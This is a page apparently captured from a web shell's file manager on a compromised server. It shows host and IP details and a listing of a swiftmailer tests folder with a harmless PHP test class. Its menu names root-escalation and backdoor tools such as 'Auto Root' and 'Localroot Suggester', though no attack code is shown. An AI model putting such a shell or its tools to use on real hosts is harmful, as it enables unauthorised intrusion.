Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.117.132.79
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
1 /
vendor /
swiftmailer /
swiftmailer /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
_samples
[ DIR ]
drwxr-xr-x
2020-11-17 16:24
acceptance
[ DIR ]
drwxr-xr-x
2020-11-17 16:24
bug
[ DIR ]
drwxr-xr-x
2020-11-17 16:24
fixtures
[ DIR ]
drwxr-xr-x
2020-11-17 16:24
smoke
[ DIR ]
drwxr-xr-x
2020-11-17 16:24
unit
[ DIR ]
drwxr-xr-x
2020-11-17 16:24
IdenticalBinaryConstraint.php
1.22
KB
-rw-r--r--
2020-11-17 16:24
StreamCollector.php
145
B
-rw-r--r--
2020-11-17 16:24
SwiftMailerSmokeTestCase.php
1.47
KB
-rw-r--r--
2020-11-17 16:24
SwiftMailerTestCase.php
891
B
-rw-r--r--
2020-11-17 16:24
acceptance.conf.php.default
1.01
KB
-rw-r--r--
2020-11-17 16:24
bootstrap.php
662
B
-rw-r--r--
2020-11-17 16:24
smoke.conf.php.default
1.53
KB
-rw-r--r--
2020-11-17 16:24
Save
Rename
<?php /** * A binary safe string comparison. * * @author Chris Corbyn */ class IdenticalBinaryConstraint extends \PHPUnit\Framework\Constraint\Constraint { protected $value; public function __construct($value) { $this->value = $value; } /** * Evaluates the constraint for parameter $other. Returns TRUE if the * constraint is met, FALSE otherwise. * * @param mixed $other Value or object to evaluate. * * @return bool */ public function matches($other) { $aHex = $this->asHexString($this->value); $bHex = $this->asHexString($other); return $aHex === $bHex; } /** * Returns a string representation of the constraint. * * @return string */ public function toString() { return 'identical binary'; } /** * Get the given string of bytes as a stirng of Hexadecimal sequences. * * @param string $binary * * @return string */ private function asHexString($binary) { $hex = ''; $bytes = unpack('H*', $binary); foreach ($bytes as &$byte) { $byte = strtoupper($byte); } return implode('', $bytes); } }